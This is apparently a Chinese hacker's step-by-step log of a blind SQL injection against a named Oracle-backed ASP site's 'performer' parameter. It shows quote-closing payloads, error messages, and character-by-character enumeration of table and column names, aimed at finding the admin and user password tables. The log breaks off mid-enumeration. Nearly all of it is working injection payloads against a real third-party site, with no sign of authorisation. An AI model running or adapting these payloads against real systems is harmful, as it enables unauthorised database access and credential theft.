http://et.kpworld.com/star.asp?performer=马三立;
------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00911:
invalid character
/star.asp,行83
说明过滤了分号。
http://et.kpworld.com/star.asp?performer=马三立'
----------------------------------------------------
OraOLEDB 错误 '80004005' ORA-01756:
括号内的字符串没有正确结束
/star.asp,行83
看来存在未过滤单引号问题。
http://et.kpworld.com/star.asp?performer=马三立' and '1'='1
----------------------------------------------------------------
闭和他单引号,正常返回。
and 0<>(select count(*) from admin) and '1'='1
-----------------------------------------------------------------
OraOLEDB 错误 '80040e37' ORA-00942:
table or view does not exist
/star.asp,行83
说明不存在ADMIN这个表.
******************************************************************
下面需要知道ORACLE的系统表:
确定表中行的总数:
select num_rows from user_tables where table_name='表名 ----------------------存放当前用户所有表
where table_name='表名
'selectcolumn_name,
from user_tab_columns -----------------------存放所有列
where table_name='表名'
and 0<>(select count(*) from all_tables) and '1'='1
---------------------------------------------------------------------
存在!
all_tables是一个系统表,用来存放当前ID和其他用户的所有表
and 0<>(select count(*) from user_tables) and '1'='1
---------------------------------------------------------------------
返回。有这个系统表,这个表存放当前用户的所有表
and 0<>(select top 1 table_name from user_tables) and '1'='1
---------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00923:
FROM keyword not found where expected
/star.asp,行83
不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。
(经过PINKEYES测试已经确定确实不支持TOP 1)
and 0<>(select count(*) from user_tables where table_nam<>'') and '1'='1
--------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00904:
invalid column name /star.asp,行83
当语法错误时,会显示无效列名字
and 0<>(select count(*) from user_tables where table_name<>'''') and '1'='1
--------------------------------------------------------------------------------------------
语法正确时,成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试:
and 0<>(select count(*) from user_tables where sum(table_name)>1) and '1'='1
------------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934:
group function is not allowed here
/star.asp,行83
组函数不允许在这里。
and 0<>(select count(*) from user_tables where avg(table_name)) and '1'='1
-------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934:
group function is not allowed here /star.asp,行83
组函数不允许在这里。
and 0<>(select to_char(table_name) from user_tables) and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80004005' ORA-01427:
single-row subquery returns more than one row
/star.asp,行83
单行的子查询返回多于一行
and 0<>(select count(*) from user_tables where table_name+1) and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00920:
invalid relational operator
/star.asp,行83
测试到这里,下面看看怎么弄出他的表来:
and 0<>(select count(*) from performer) and%20'1'='1
-----------------------------------------------------
成功返回。这里的表是看前面URL猜的.
and 0<>(select count(*) from user_tables where table_name='performer') and%20'1'='1
-------------------------------------------------------------------------------------
没返回。失败标志。
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER') and%20'1'='1
------------------------------------------------------------------------------------------------
成功了! 看来这个user_tables表只认识大写字母!
and 0<>(select count(*) from user_tables where length(table_name)>10) and%20'1'='1
------------------------------------------------------------------------------------
用length函数确定最长表的位数
and 0<>(select count(*) from user_tables where length(table_name)=18) and%20'1'='1
-------------------------------------------------------------------------------------
省略若干步骤,最后确定最长表为18位。
and 0<>(select count(*) from user_tables where substr(table_name,1,1)='A') and%20'1'='1
-----------------------------------------------------------------------------------------
第一位为'A',
and 0<>(select count(*) from user_tables where substr(table_name,1,2)='AD') and%20'1'='1
-----------------------------------------------------------------------------------------
第二位为'AD'
and 0<>(select count(*) from user_tables where substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1
---------------------------------------------------------------------------------------------
省略若干,18位的表名为'ADMINAUTHORIZATION'。
and 1=(select count(*) from user_tables where table_name='ADMINAUTHORIZATION') and%20'1'='1
--------------------------------------------------------------------------------------------
返回。
and 0<>(select count(*) from user_tables where length(table_name)=2) and%20'1'='1
----------------------------------------------------------------------------------
最小表名长度为2
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1
-------------------------------------------------------------------------------------------------
没返回。
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25') and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
都成功返回。看来可以利用LIKE猜。
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8) and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
利用LIKE和LENGTH组合猜,马上就能确定长度。
and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜出第四位是S。接下来就是重复劳动了。
and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜出来了。'BBSSUBJECT'
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
没返回,不象是保存用户和密码的表。再来。。。
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15